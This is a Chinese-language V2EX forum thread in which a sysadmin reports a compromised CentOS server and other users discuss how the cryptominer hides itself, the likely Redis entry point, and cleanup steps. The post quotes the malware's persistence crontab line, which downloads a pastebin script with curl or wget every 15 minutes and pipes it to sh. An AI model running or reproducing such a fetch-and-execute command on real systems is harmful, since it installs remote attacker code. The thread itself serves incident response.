Linux 被入侵了该怎么整,入侵者摆明了不怕你知道

2019-02-21 23:26:20 +08:00
 abcbuzhiming
今天一觉起来,被报告说有台 CentOS7.5 速度变的很卡。上去一看,没发现 CPU,内存占用有什么很异常的地方,随手敲 netstat -ntlp 准备看看端口占用是不是由异常,结果出现提示:-bash: /usr/bin/netstat: No such file or directory。啊?什么鬼。再一检查 /usr/bin/netstat 文件不存在,我还以为是被不小心删掉了,不管,yum reinstall net-tools 重装网络套件,结果这一装就露出马脚了,/usr/bin/netstat 文件在刚装好的时候是可以用的,几分钟之内,就不翼而飞了,反复几次后,我就明白有什么程序把它给自动删掉了。随后进一步检查发现,
crontab -l 查定时任务发现这样一行代码:绝对不是我设置的
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
打开这个网址发现得到的是一串明显被加密过的字符串,无法进一步排查。删除这个信息,几分钟内会被重新添加。

现在,用 netstat -ntlp 查不出有异常端口,但是我个人怀疑 netstat 很可能已被某种手段屏蔽,证据就是它看不到占用 80 端口的 Nginx (我确定 Nginx 仍然在工作)的 PID(显示为 - ),lsof -i:80 同样失效,我猜测黑客(木马)是打算使用 80 端口的,但是 80 端口跑着 Nginx 导致没成功。机器上的 /usr/bin/netstat 每隔几分钟就被删除,计划任务里始终有那条自动执行请求,我删掉等一会就会自动添加。ps -ef 查不出有异常进程,CPU 和内存均无特别异常,就是系统响应速度慢。我该咋办,除了备份数据重装系统没办法了吗?头一次这么嚣张的 Linux 入侵
18575 次点击
所在节点    Linux
106 条回复
abcbuzhiming
2019-02-22 09:59:41 +08:00
@passerbytiny Redis 开了公网访问,但是设置了 32 位强密码。难道密码外泄了?但是 redis 到底是如何造成木马进入的?原理是什么?有没有方法避免,mysql 密码让人知道了也就是脱裤,这能上传木马破坏威力太大了
test12138
2019-02-22 10:05:05 +08:00
@goophy 遇到过类似的攻击脚本,求解决方案
al0ne
2019-02-22 10:12:03 +08:00
https://github.com/al0ne/LinuxCheck 试试这个脚本 寻找 linux 问题的
linnil
2019-02-22 10:24:56 +08:00
咋感觉都没人愿意理我呢,昨天正好看了下这个 sByq0rym 这个挖矿木马。又花五分给说说,极力挽救一下。
木马主要是利用定时任务,每 15/30 分钟执行一次,而且该木马会覆盖一个库函数,当你使用一些命令的时候会调用该库的函数,作者在函数里进行了屏蔽,比如 ps 的时候,显示不出进程,而且在你用 vi 修改定时任务的时候,会先将数据写入到定时任务文件。所以对付它可以先停掉定时任务,然后删掉那个动态链接库,然后刷新并重建定时任务文件,在开启定时任务。
脚本里面有函数,虽然命名不规范,很垃圾,但是应该也许容易看。
Biebe
2019-02-22 10:27:27 +08:00
开放 ssh,让其他所谓的入侵者一起进去,以毒攻毒
Acoffice
2019-02-22 10:28:08 +08:00
@linnil 我转发我同事试了,不知道啥时间会给我回复....🙏
pain400
2019-02-22 10:28:47 +08:00
@zou2699 不是特别懂,怎么定位到 redis 的,能说说吗
Acoffice
2019-02-22 10:29:54 +08:00
@linnil 而且这个最近貌似感染了不少机器,但是从哪里进来的感染的,没找到.如果你能出一个详细解说文档,我觉得会更好啊.
mingzu
2019-02-22 10:30:06 +08:00
目测 redis 未授权写文件。。。
wasmir
2019-02-22 10:33:45 +08:00
@abcbuzhiming redis 可以通过 lua 或数据备份往你磁盘里写东西
zhangneww
2019-02-22 10:34:21 +08:00
redis 非常容易被入侵,别问我是怎么知道的
Hazurt
2019-02-22 10:35:49 +08:00
家里公网 22 端口上放了一个树莓派,至今还没高手闯进来玩玩,不过扫端口挺多的,最近两周统计到 4656 个 ip。
( PS:不是引诱大家去攻击的,就不放地址了)
linnil
2019-02-22 10:39:19 +08:00
@Acoffice 我整理一下,稍等。
17612729987
2019-02-22 10:46:02 +08:00
@linnil 整理好了艾特我一下,我也中招了
ww2000e
2019-02-22 10:47:21 +08:00
@Hazurt 你家咋有公网 ip 的。。
maliming
2019-02-22 10:47:37 +08:00
还是 docker 好!
nicevar
2019-02-22 10:48:14 +08:00
@Hazurt 谁没事去玩你的,高手很忙的,现在一套下来都是自动扫描植入后门或挖矿脚本然后继续自动扩散,阿里云一大票主机都是这样被搞定的,所以有人经常问为啥会有内网的机器扫描自己的服务器
可以看一下服务器的安全日志,一堆都是阿里云或者腾讯云的 ip 自动扫描,反查过去一看都是些什么小公司的服务器,平时没有什么人管理的那种
Redis 的漏洞已经冒出来很长时间,我不知道为啥老有些人喜欢开公网端口,真的是作死,开公网端口一旦有未公开的溢出漏洞就会死得很惨,不仅仅是 Redis,像 MySQL 也一样
passerbytiny
2019-02-22 10:48:20 +08:00
@abcbuzhiming #39 Redis 设置了密码,那 Redis 是原因的可能性就不大了。我不是运维,后面也只能看了,知道 Reids 这个是因为之前公司踩过坑。Redis 有一个漏洞,有特殊方法可以通过正常的 Redis 端口获取到主机的 Root 权限,然而这个漏洞在 Redis 开发者那里被标记为不予解决,因为 Reids 设计的应用环境是纯内网访问。
guanhui07
2019-02-22 10:55:34 +08:00
redis 一定要修改端口,设置密码
Xavier001
2019-02-22 10:57:18 +08:00
插眼

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/537457

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX